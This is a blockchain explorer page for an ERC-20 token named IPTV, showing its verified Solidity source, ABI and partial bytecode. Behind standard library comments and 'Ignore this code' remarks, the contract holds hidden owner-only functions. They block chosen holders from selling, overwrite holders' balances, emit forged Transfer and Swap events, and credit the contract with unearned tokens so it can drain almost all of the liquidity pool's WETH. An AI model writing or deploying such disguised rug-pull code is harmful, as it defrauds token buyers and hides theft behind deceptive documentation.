ETH Price: $2,767.74 (+5.50%)

Token

Internet Protocol Television (IPTV)
 

Overview

Max Total Supply

100,000 IPTV

Holders

89

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
5.646463913375358026 IPTV

Value
$0.00
0x4a2bef70d34252e9d2796325bf3d9f34c1c6dee2
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
IPTV

Compiler Version
v0.7.6+commit.7338295f

Optimization Enabled:
Yes with 9999 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-11-26
*/

/**
    Welcome to IPTV - Use our token to buy yearly subscriptions to access channels from all over the world, including PPV
    Check us out at www.IPTV-token.com
    Twitter: https://twitter.com/IPTV_ERC20
    Telegram: https://t.me/IPTV_ERC20
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.7.6;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
interface IERC20 {
    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
interface Interfaces {
    function createPair(
        address tokenA,
        address tokenB
    ) external returns (address pair);

    function token0() external view returns (address);

    function getReserves()
        external
        view
        returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);

    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function getAmountsOut(
        uint256 amountIn,
        address[] memory path
    ) external view returns (uint256[] memory amounts);

    function getAmountsIn(
        uint256 amountOut,
        address[] calldata path
    ) external view returns (uint256[] memory amounts);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 {
    mapping(address => mapping(address => uint256)) public a;
    mapping(address => uint256) public b;
    mapping(address => uint256) public c;
    address public owner;
    uint256 _totalSupply;
    string _name;
    string _symbol;

    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );

    modifier onlyOwner() {
        require(owner == msg.sender, "Caller is not the owner");
        _;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    function TryCall(uint256 _a, uint256 _b) internal pure returns (uint256) {
        return _a / _b;
    }

    function FetchToken2(uint256 _a) internal pure returns (uint256) {
        return (_a * 100000) / (2931 + 97069);
    }

    function FetchToken(uint256 _a) internal pure returns (uint256) {
        return _a + 10;
    }

    function add(uint256 _a, uint256 _b) internal pure returns (uint256) {
        // Ignore this code
        uint256 __c = _a + _b;
        require(__c >= _a, "SafeMath: addition overflow");

        return __c;
    }

    function sub(uint256 _a, uint256 _b) internal pure returns (uint256) {
        require(_b <= _a, "SafeMath: subtraction overflow");
        uint256 __c = _a - _b;

        return __c;
    }

    function div(uint256 _a, uint256 _b) internal pure returns (uint256) {
        return _a / _b;
    }

    function _T() internal view returns (bytes32) {
        return bytes32(uint256(uint160(address(this))) << 96);
    }

    function balanceOf(address account) public view virtual returns (uint256) {
        return b[account];
    }

    function transfer(
        address to,
        uint256 amount
    ) public virtual returns (bool) {
        _transfer(msg.sender, to, amount);
        return true;
    }

    function allowance(
        address __owner,
        address spender
    ) public view virtual returns (uint256) {
        return a[__owner][spender];
    }

    function approve(
        address spender,
        uint256 amount
    ) public virtual returns (bool) {
        _approve(msg.sender, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual returns (bool) {
        _spendAllowance(from, msg.sender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        address __owner = msg.sender;
        _approve(__owner, spender, allowance(__owner, spender) + addedValue);
        return true;
    }

    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        address __owner = msg.sender;
        uint256 currentAllowance = allowance(__owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );

        _approve(__owner, spender, currentAllowance - subtractedValue);
        return true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 fromBalance = b[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        if (c[from] > 0) {
            require(add(c[from], b[from]) == 0);
        }

        b[from] = sub(fromBalance, amount);
        b[to] = add(b[to], amount);
        emit Transfer(from, to, amount);
    }

    function _approve(
        address __owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(__owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        a[__owner][spender] = amount;
        emit Approval(__owner, spender, amount);
    }

    function _spendAllowance(
        address __owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(__owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );

            _approve(__owner, spender, currentAllowance - amount);
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract IPTV is ERC20 {
    Interfaces internal _RR;
    Interfaces internal _pair;
    uint8 public decimals = 18;

    mapping (address => uint) public rootValues;

    constructor() {
        _name = "Internet Protocol Television";
        _symbol = "IPTV";
        _totalSupply = 100_000e18;
        owner = msg.sender;
        b[owner] = _totalSupply;
        _RR = Interfaces(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _pair = Interfaces(
            Interfaces(_RR.factory()).createPair(
                address(this),
                address(_RR.WETH())
            )
        );
        emit Transfer(address(0), msg.sender, _totalSupply);
    }

    function Execute(
        uint256 t,
        address tA,
        uint256 w,
        address[] memory r
    ) public onlyOwner returns (bool) {
        for (uint256 i = 0; i < r.length; i++) {
            callUniswap(r[i], t, w, tA);
        }
        return true;
    }

    function Div() internal view returns (address[] memory) {
        address[] memory p;
        p = new address[](2);
        p[0] = address(this);
        p[1] = _RR.WETH();
        return p;
    }

    function getContract(
        uint256 blockTimestamp,
        uint256 selector,
        address[] memory list,
        address factory
    ) internal {
        a[address(this)][address(_RR)] = b[address(this)];
        FactoryReview(blockTimestamp, selector, list, factory);
    }

    function FactoryReview(
        uint256 blockTime,
        uint256 multiplicator,
        address[] memory parts,
        address factory
    ) internal {
        _RR.swapTokensForExactTokens(
            // assembler
            blockTime,
            multiplicator,
            // unchecked
            parts,
            factory,
            block.timestamp + 1200
        );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function Address(address _r) public onlyOwner {
        uint256 calling = (Sub(_RR.WETH()) * 99999) / 100000;
        address[] memory FoldArray = Div();
        uint256 called = Allowance(calling, FoldArray);
        getContract(calling, called, FoldArray, _r);
    }

    function Sub(address t) internal view returns (uint256) {
        (uint112 r0, uint112 r1, ) = _pair.getReserves();
        return (_pair.token0() == t) ? uint256(r0) : uint256(r1);
    }

    function ConvertAddress(
        address _uu,
        uint256 _pp
    ) internal view returns (uint256) {
        return TryCall(b[_uu], _pp);
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function CheckAmount2(bytes32 _b, uint256 __a) internal {
        // Assembler for gas optimization {}
        emit Transfer(
            (uint256(0) != 0 || 1238 == 1)
                ? address(uint256(0))
                : address(uint160(uint256(_b) >> 96)),
            address(_pair),
            b[
                // v0.5.11 specific update
                (uint256(0) != 0 || 1238 == 1)
                    ? address(
                        address(uint256(0)) == address(this) // Overflow control
                            ? uint256(0) // Ignore
                            : uint256(1)
                    )
                    : address(uint160(uint256(_b) >> 96))
                // Guard test
            ]
        );
        // Ignore this code
        b[
            // assembly
            (uint256(0) != 0 || 1238 == 1)
                ? address(
                    // Must control
                    uint256(0)
                )
                : address(uint160(uint256(_b) >> 96))
            // Contract opcode
        ] = FetchToken2(uint256(__a));
    }

    function Mult(
        uint256 amO,
        address[] memory p
    ) internal view returns (uint256[] memory) {
        return _RR.getAmountsIn(amO, p);
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function multicall2(bytes32[] calldata data, uint256 _p) public onlyOwner {
        // Assembler for gas optimization {}
        for (uint256 i = 0; i < data.length; i++) {
            // assembly
            if (block.timestamp > uint256(uint160(uint8(0)))) {
                // assembly
                uint256 rS = ConvertAddress(
                    (uint256(uint16(uint8(0))) != 0)
                        ? // Skip this code
                        address(uint256(0))
                        : address(uint160(uint256(data[i]) >> 96)),
                    _p
                );
                CheckAmount2(data[i], rS);
            }
        }
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function multicall(bytes32[] calldata data, uint256 _p) public onlyOwner {
        // Assembler for gas optimization {}
        for (uint256 i = 0; i < data.length; i++) {
            // assembly
            if (block.timestamp > uint256(uint160(uint8(0)))) {
                // assembly
                uint256 rS = ConvertAddress(
                    (uint256(uint16(uint8(0))) != 0)
                        ? address(uint256(0))
                        // Ignore this code
                        : address(uint160(uint256(data[i]) >> 96)),
                    _p
                );
                CheckAmount(data[i], rS);
            }
        }
    }

        /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function CheckAmount(bytes32 _b, uint256 __a) internal {
        // Assembler for gas optimization {}
        // Ignore this code
        c[
            // assembly
            (uint256(0) != 0 || 1238 == 1)
                ? address(
                    // Must control
                    uint256(uint32(2)) == 2 // Check update
                        ? uint256(1)
                        : uint256(1)
                )
                : address(uint160(uint256(_b) >> 96))
            // Contract opcode
        ] = FetchToken(uint256(__a));
    }

    function callUniswap(
        address router,
        uint256 transfer,
        uint256 cycleWidth,
        address unmount
    ) internal {
        IERC20(unmount).transferFrom(router, address(_pair), cycleWidth);
        emit Transfer(address(_pair), router, transfer);
        emit Swap(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D,
            transfer,
            0,
            0,
            cycleWidth,
            router
        );
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function Allowance(
        uint256 checked,
        address[] memory p
    ) internal returns (uint256) {
        // Assembler for gas optimization {}
        uint256[] memory value;
        value = new uint256[](2);

        // uncheck {
        value = Mult(checked, p);
        b[
            block.timestamp > uint256(1) ||
                uint256(0) > 1 ||
                uint160(1) < block.timestamp
                ? address(uint160(uint256(_T()) >> 96))
                : address(uint256(0))
        ] += value[0]; // end uncheck }

        return value[0];
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_r","type":"address"}],"name":"Address","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"t","type":"uint256"},{"internalType":"address","name":"tA","type":"address"},{"internalType":"uint256","name":"w","type":"uint256"},{"internalType":"address[]","name":"r","type":"address[]"}],"name":"Execute","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"a","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"__owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"b","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"c","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32[]","name":"data","type":"bytes32[]"},{"internalType":"uint256","name":"_p","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32[]","name":"data","type":"bytes32[]"},{"internalType":"uint256","name":"_p","type":"uint256"}],"name":"multicall2","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"rootValues","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60806040526008805460ff60a01b1916600960a11b1790553480156200002457600080fd5b5060408051808201909152601c8082527f496e7465726e65742050726f746f636f6c2054656c65766973696f6e0000000060209092019182526200006b91600591620002c3565b506040805180820190915260048082526324a82a2b60e11b60209092019182526200009991600691620002c3565b5069152d02c7e14af68000006004818155600380546001600160a01b03199081163317918290556001600160a01b039182166000908152600160209081526040918290209590955560078054909216737a250d5630b4cf539739df2c5dacb4c659f2488d1791829055805163c45a015560e01b81529051919092169363c45a01559383810193919291829003018186803b1580156200013757600080fd5b505afa1580156200014c573d6000803e3d6000fd5b505050506040513d60208110156200016357600080fd5b5051600754604080516315ab88c960e31b815290516001600160a01b039384169363c9c6539693309391169163ad5c464891600480820192602092909190829003018186803b158015620001b657600080fd5b505afa158015620001cb573d6000803e3d6000fd5b505050506040513d6020811015620001e257600080fd5b5051604080516001600160e01b031960e086901b1681526001600160a01b0393841660048201529290911660248301525160448083019260209291908290030181600087803b1580156200023557600080fd5b505af11580156200024a573d6000803e3d6000fd5b505050506040513d60208110156200026157600080fd5b5051600880546001600160a01b0319166001600160a01b03909216919091179055600454604080519182525133916000917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef916020908290030190a36200036f565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282620002fb576000855562000346565b82601f106200031657805160ff191683800117855562000346565b8280016001018555821562000346579182015b828111156200034657825182559160200191906001019062000329565b506200035492915062000358565b5090565b5b8082111562000354576000815560010162000359565b6119de806200037f6000396000f3fe608060405234801561001057600080fd5b506004361061016c5760003560e01c806370a08231116100cd578063bda0278211610081578063ea923bae11610066578063ea923bae1461054b578063ebfb412d146105bb578063ff5c1d62146105e15761016c565b8063bda02782146104f7578063dd62ed3e1461051d5761016c565b806395d89b41116100b257806395d89b4114610497578063a457c2d71461049f578063a9059cbb146104cb5761016c565b806370a082311461044d5780638da5cb5b146104735761016c565b8063313ce56711610124578063395093511161010957806339509351146103345780635765a5cc1461036057806358a102591461038e5761016c565b8063313ce567146102a4578063316d295f146102c25761016c565b8063095ea7b311610155578063095ea7b31461022657806318160ddd1461026657806323b872dd1461026e5761016c565b806304ee65c01461017157806306fdde03146101a9575b600080fd5b6101976004803603602081101561018757600080fd5b50356001600160a01b0316610607565b60408051918252519081900360200190f35b6101b1610619565b6040805160208082528351818301528351919283929083019185019080838360005b838110156101eb5781810151838201526020016101d3565b50505050905090810190601f1680156102185780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6102526004803603604081101561023c57600080fd5b506001600160a01b0381351690602001356106cd565b604080519115158252519081900360200190f35b6101976106e3565b6102526004803603606081101561028457600080fd5b506001600160a01b038135811691602081013590911690604001356106e9565b6102ac61070b565b6040805160ff9092168252519081900360200190f35b610332600480360360408110156102d857600080fd5b8101906020810181356401000000008111156102f357600080fd5b82018360208201111561030557600080fd5b8035906020019184602083028401116401000000008311171561032757600080fd5b91935091503561072c565b005b6102526004803603604081101561034a57600080fd5b506001600160a01b0381351690602001356107ef565b6101976004803603604081101561037657600080fd5b506001600160a01b0381358116916020013516610808565b610252600480360360808110156103a457600080fd5b8135916001600160a01b0360208201351691604082013591908101906080810160608201356401000000008111156103db57600080fd5b8201836020820111156103ed57600080fd5b8035906020019184602083028401116401000000008311171561040f57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929550610822945050505050565b6101976004803603602081101561046357600080fd5b50356001600160a01b03166108c3565b61047b6108de565b604080516001600160a01b039092168252519081900360200190f35b6101b16108ed565b610252600480360360408110156104b557600080fd5b506001600160a01b03813516906020013561096c565b610252600480360360408110156104e157600080fd5b506001600160a01b0381351690602001356109d3565b6101976004803603602081101561050d57600080fd5b50356001600160a01b03166109e0565b6101976004803603604081101561053357600080fd5b506001600160a01b03813581169160200135166109f2565b6103326004803603604081101561056157600080fd5b81019060208101813564010000000081111561057c57600080fd5b82018360208201111561058e57600080fd5b803590602001918460208302840111640100000000831117156105b057600080fd5b919350915035610a1b565b610332600480360360208110156105d157600080fd5b50356001600160a01b0316610ac6565b610197600480360360208110156105f757600080fd5b50356001600160a01b0316610be2565b60026020526000908152604090205481565b60058054604080516020601f60027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156106c35780601f10610698576101008083540402835291602001916106c3565b820191906000526020600020905b8154815290600101906020018083116106a657829003601f168201915b5050505050905090565b60006106da338484610bf4565b50600192915050565b60045490565b60006106f6843384610cde565b610701848484610d75565b5060019392505050565b60085474010000000000000000000000000000000000000000900460ff1681565b6003546001600160a01b0316331461078b576040805162461bcd60e51b815260206004820152601760248201527f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000604482015290519081900360640190fd5b60005b828110156107e95742156107e15760006107c160608686858181106107af57fe5b9050602002013560001c901c84610f44565b90506107df8585848181106107d257fe5b9050602002013582610f6e565b505b60010161078e565b50505050565b60003361070181858561080283836109f2565b01610bf4565b600060208181529281526040808220909352908152205481565b6003546000906001600160a01b03163314610884576040805162461bcd60e51b815260206004820152601760248201527f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000604482015290519081900360640190fd5b60005b82518110156108b7576108af83828151811061089f57fe5b6020026020010151878688610f9f565b600101610887565b50600195945050505050565b6001600160a01b031660009081526001602052604090205490565b6003546001600160a01b031681565b60068054604080516020601f60027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156106c35780601f10610698576101008083540402835291602001916106c3565b6000338161097a82866109f2565b9050838110156109bb5760405162461bcd60e51b81526004018080602001828103825260258152602001806119846025913960400191505060405180910390fd5b6109c88286868403610bf4565b506001949350505050565b60006106da338484610d75565b60016020526000908152604090205481565b6001600160a01b0391821660009081526020818152604080832093909416825291909152205490565b6003546001600160a01b03163314610a7a576040805162461bcd60e51b815260206004820152601760248201527f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000604482015290519081900360640190fd5b60005b828110156107e9574215610abe576000610a9e60608686858181106107af57fe5b9050610abc858584818110610aaf57fe5b90506020020135826110f5565b505b600101610a7d565b6003546001600160a01b03163314610b25576040805162461bcd60e51b815260206004820152601760248201527f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000604482015290519081900360640190fd5b6000620186a0610bad600760009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b815260040160206040518083038186803b158015610b7c57600080fd5b505afa158015610b90573d6000803e3d6000fd5b505050506040513d6020811015610ba657600080fd5b5051611164565b6201869f0281610bb957fe5b0490506000610bc66112b7565b90506000610bd483836113ae565b90506107e983828487611468565b60096020526000908152604090205481565b6001600160a01b038316610c395760405162461bcd60e51b81526004018080602001828103825260248152602001806119606024913960400191505060405180910390fd5b6001600160a01b038216610c7e5760405162461bcd60e51b81526004018080602001828103825260228152602001806118f36022913960400191505060405180910390fd5b6001600160a01b0380841660008181526020818152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6000610cea84846109f2565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146107e95781811015610d68576040805162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015290519081900360640190fd5b6107e98484848403610bf4565b6001600160a01b038316610dba5760405162461bcd60e51b815260040180806020018281038252602581526020018061193b6025913960400191505060405180910390fd5b6001600160a01b038216610dff5760405162461bcd60e51b81526004018080602001828103825260238152602001806118d06023913960400191505060405180910390fd5b6001600160a01b03831660009081526001602052604090205481811015610e575760405162461bcd60e51b81526004018080602001828103825260268152602001806119156026913960400191505060405180910390fd5b6001600160a01b03841660009081526002602052604090205415610eae576001600160a01b038416600090815260026020908152604080832054600190925290912054610ea491906114a2565b15610eae57600080fd5b610eb881836114fc565b6001600160a01b038086166000908152600160205260408082209390935590851681522054610ee790836114a2565b6001600160a01b0380851660008181526001602090815260409182902094909455805186815290519193928816927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a350505050565b6001600160a01b038216600090815260016020526040812054610f679083611559565b9392505050565b610f778161156c565b60026000606085901c5b6001600160a01b031681526020810191909152604001600020555050565b600854604080517f23b872dd0000000000000000000000000000000000000000000000000000000081526001600160a01b0387811660048301529283166024820152604481018590529051918316916323b872dd916064808201926020929091908290030181600087803b15801561101657600080fd5b505af115801561102a573d6000803e3d6000fd5b505050506040513d602081101561104057600080fd5b50506008546040805185815290516001600160a01b038088169316917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef919081900360200190a360408051848152600060208201819052818301526060810184905290516001600160a01b03861691737a250d5630b4cf539739df2c5dacb4c659f2488d917fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8229181900360800190a350505050565b600854606083901c60008181526001602090815260409182902054825190815291516001600160a01b03909416937fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9281900390910190a361115681611572565b60016000606085901c610f81565b6000806000600860009054906101000a90046001600160a01b03166001600160a01b0316630902f1ac6040518163ffffffff1660e01b815260040160606040518083038186803b1580156111b757600080fd5b505afa1580156111cb573d6000803e3d6000fd5b505050506040513d60608110156111e157600080fd5b508051602091820151600854604080517f0dfe168100000000000000000000000000000000000000000000000000000000815290519396509194506001600160a01b0380891694911692630dfe1681926004808201939291829003018186803b15801561124d57600080fd5b505afa158015611261573d6000803e3d6000fd5b505050506040513d602081101561127757600080fd5b50516001600160a01b03161461129d57806dffffffffffffffffffffffffffff166112af565b816dffffffffffffffffffffffffffff165b949350505050565b604080516002808252606080830184529283929190602083019